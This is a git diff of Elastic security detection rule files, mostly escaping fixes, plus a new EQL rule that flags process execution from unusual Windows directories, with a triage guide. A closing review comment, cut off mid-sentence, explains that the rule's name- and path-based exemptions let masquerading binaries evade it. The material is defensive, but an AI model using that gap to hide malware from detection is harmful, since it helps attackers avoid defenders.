index d97df084acb..7b62464cf8f 100644
--- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json
index c8163290f3b..9dc93bdaa5c 100644
--- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json index 268782456a7..04f43959019 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json index d29beb69cc4..100c5574137 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json index 7524f62af0f..6f5e0555a07 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json 
@@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json index 76712eb28cc..d0f0b4d4617 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json 
@@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json index d14e8fa86a7..950f14b1459 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json 
@@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json index 467ac76b573..113c858554b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json 
@@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json index e7226dbeb55..c5ddf1d8edb 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json index 1527ca28c71..d646df70f78 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json index f02dbc92bc0..59f746cf0b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json index 791cd5e7c05..dfe5bbfe899 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json 
@@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_108.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_108.json new file mode 100644 index 00000000000..fac3d857893 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_108.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Execution from an Unusual Directory", + "note": "## Triage and analysis\n\n### Investigating Process Execution from an Unusual Directory\n\nThis rule identifies processes that are executed from suspicious default Windows directories. Adversaries may abuse this technique by planting malware in trusted paths, making it difficult for security analysts to discern if their activities are malicious or take advantage of exceptions that may apply to these paths.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes, examining their executable files for prevalence, location, and valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine arguments and working directory to determine the program's source or the nature of the tasks it is performing.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT 
description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of executable and signature conditions.\n\n### Related Rules\n\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Execution from Unusual Directory - Command Line - cff92c41-2225-4763-b4ce-6f71e5bda5e6\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified 
during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* add suspicious execution paths here */\n process.executable : (\n \"?:\\\\PerfLogs\\\\*.exe\", \"?:\\\\Users\\\\Public\\\\*.exe\", \"?:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"?:\\\\Intel\\\\*.exe\", \"?:\\\\AMD\\\\Temp\\\\*.exe\", \"?:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\n \"?:\\\\Windows\\\\Branding\\\\*.exe\", \"?:\\\\Windows\\\\csc\\\\*.exe\", \"?:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\n \"?:\\\\Windows\\\\en-US\\\\*.exe\", \"?:\\\\Windows\\\\wlansvc\\\\*.exe\", \"?:\\\\Windows\\\\Prefetch\\\\*.exe\",\n \"?:\\\\Windows\\\\Fonts\\\\*.exe\", \"?:\\\\Windows\\\\diagnostics\\\\*.exe\", \"?:\\\\Windows\\\\TAPI\\\\*.exe\",\n \"?:\\\\Windows\\\\INF\\\\*.exe\", \"?:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\", \"?:\\\\windows\\\\tracing\\\\*.exe\",\n \"?:\\\\windows\\\\IME\\\\*.exe\", \"?:\\\\Windows\\\\Performance\\\\*.exe\", \"?:\\\\windows\\\\intel\\\\*.exe\",\n \"?:\\\\windows\\\\ms\\\\*.exe\", \"?:\\\\Windows\\\\dot3svc\\\\*.exe\", \"?:\\\\Windows\\\\panther\\\\*.exe\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.exe\", \"?:\\\\Windows\\\\OCR\\\\*.exe\", 
\"?:\\\\Windows\\\\appcompat\\\\*.exe\",\n \"?:\\\\Windows\\\\apppatch\\\\*.exe\", \"?:\\\\Windows\\\\addins\\\\*.exe\", \"?:\\\\Windows\\\\Setup\\\\*.exe\",\n \"?:\\\\Windows\\\\Help\\\\*.exe\", \"?:\\\\Windows\\\\SKB\\\\*.exe\", \"?:\\\\Windows\\\\Vss\\\\*.exe\",\n \"?:\\\\Windows\\\\Web\\\\*.exe\", \"?:\\\\Windows\\\\servicing\\\\*.exe\", \"?:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"?:\\\\Windows\\\\Logs\\\\*.exe\", \"?:\\\\Windows\\\\WaaS\\\\*.exe\", \"?:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.exe\", \"?:\\\\Windows\\\\PLA\\\\*.exe\", \"?:\\\\Windows\\\\Migration\\\\*.exe\",\n \"?:\\\\Windows\\\\debug\\\\*.exe\", \"?:\\\\Windows\\\\Cursors\\\\*.exe\", \"?:\\\\Windows\\\\Containers\\\\*.exe\",\n \"?:\\\\Windows\\\\Boot\\\\*.exe\", \"?:\\\\Windows\\\\bcastdvr\\\\*.exe\", \"?:\\\\Windows\\\\assembly\\\\*.exe\",\n \"?:\\\\Windows\\\\TextInput\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\SchCache\\\\*.exe\", \"?:\\\\Windows\\\\Resources\\\\*.exe\", \"?:\\\\Windows\\\\rescache\\\\*.exe\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.exe\", \"?:\\\\Windows\\\\PrintDialog\\\\*.exe\", \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\n \"?:\\\\Windows\\\\media\\\\*.exe\", \"?:\\\\Windows\\\\Globalization\\\\*.exe\", \"?:\\\\Windows\\\\L2Schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.exe\", \"?:\\\\Windows\\\\ModemLogs\\\\*.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\"\n ) and\n \n not process.name : (\n \"SpeechUXWiz.exe\", \"SystemSettings.exe\", \"TrustedInstaller.exe\",\n \"PrintDialog.exe\", \"MpSigStub.exe\", \"LMS.exe\", \"mpam-*.exe\"\n ) and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n 
\"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or 
Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json index c265f7738b3..1c8fb638a1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json index b44e8cfca61..f4094f0071f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
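Review bot: The exclusion `not process.name : ("SpeechUXWiz.exe", "SystemSettings.exe", "TrustedInstaller.exe", "PrintDialog.exe", "MpSigStub.exe", "LMS.exe", "mpam-*.exe")` in the new `ebfe1448-7fac-4d59-acea-181bd89b1f7f_108.json` query suppresses any executable that merely carries one of those names inside the watched directories, which is the T1036.005 "Match Legitimate Name or Location" pattern the rule itself maps to. On the Elastic Defend streams listed in `index`, the allowlist can be bound to the signature that the commented-out clause already references, e.g. `not (process.name : ("SpeechUXWiz.exe", ...) and process.code_signature.trusted == true)`; whether that form stays equivalent to the current one on Beats data where the field is absent should be confirmed against EQL's null handling rather than assumed. The same applies to the directory-wide `"?:\\Users\\Public\\IBM\\ClientSolutions\\*.exe"` exception, which exempts a whole user-writable folder by path alone. The path list also contains 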